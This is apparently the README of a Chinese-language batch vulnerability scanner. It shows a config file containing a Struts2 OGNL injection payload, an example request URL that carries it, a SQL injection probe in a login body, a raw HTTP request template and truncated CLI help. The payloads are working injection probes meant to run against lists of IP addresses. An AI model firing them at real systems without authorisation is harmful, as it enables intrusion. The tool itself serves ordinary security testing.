scan-framework

使用步骤

配置文件

[main]
# 扫描为真的规则(支持正则)
scan_rule = hacker
# 扫描后收集结果的规则(支持正则)
res_rule = hacker
# 扫描使用的payload
payload = redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22hacker%22),%23p.close()}
# 使用raw方法,放置http报文的文件
raw_file = 
# 待扫描ip列表的文件
ip_file = c:\\ip.txt
#输出结果的文件
out_file = c:\\res.txt
# 开启的线程数
thread_num = 8
# 请求的方式
method = get

http://127.0.0.1:8080/struts_hello/hello?redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22hacker%22),%23p.close()}

scan_rule = hacker

username=admin' and 1=1&password=xxss&login=1

GET /code/test.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/code/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=bv2n8m904ggt8nsi9istnm9fg7

>python cli.py -h
Usage: cli.py [options]
Options:
 -h, --help show this help message and exit
 -m MODE, --mode=MODE